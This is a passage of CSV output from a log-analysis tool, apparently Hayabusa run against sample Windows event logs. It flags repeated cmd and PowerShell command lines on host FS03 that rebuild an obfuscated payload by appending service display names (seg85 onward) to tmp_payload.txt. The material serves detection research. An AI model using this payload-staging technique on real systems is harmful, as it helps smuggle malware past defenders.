0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:29.014 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:30.465 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg85"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x78c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:30.465 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg85"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9ac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:30.465 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:31.906 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg86"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:31.922 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg86"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc54 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:31.922 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:33.398 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg87"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6fc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:33.398 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg87"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x4d8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:33.398 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:34.891 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg88"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x29c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:34.891 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg88"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xafc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:34.891 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:36.365 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg89"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xab8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:36.365 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg89"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3d8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:36.365 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:37.818 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg90"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc30 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:37.834 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg90"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe44 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:37.834 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:39.275 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg91"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x994 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:39.275 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg91"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:39.275 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:40.758 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg92"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6e8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:40.758 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg92"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:40.758 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:42.211 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg93"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf90 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:42.227 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg93"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe58 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:42.227 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:43.667 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg94"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x990 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:43.667 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg94"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:43.667 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:45.132 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg95"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:45.132 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg95"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe8c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:45.132 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:46.606 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg96"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xeb0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:46.606 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg96"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:46.606 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:48.052 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg97"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xde8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:48.067 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg97"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xee8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:48.067 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:49.508 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg98"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xfec | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:49.508 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg98"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x420 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:49.508 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:50.946 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg99"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbf8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:50.946 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg99"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xaa0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:50.946 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:52.406 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg100"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd48 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:52.406 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg100"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x618 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:52.406 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:53.855 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg101"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1dc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:53.855 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg101"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xce0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:53.855 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:55.301 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg102"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd08 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:55.317 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg102"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xca4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:55.317 +00:00,FS03.offsec.lan,4688,low,Exec,Non 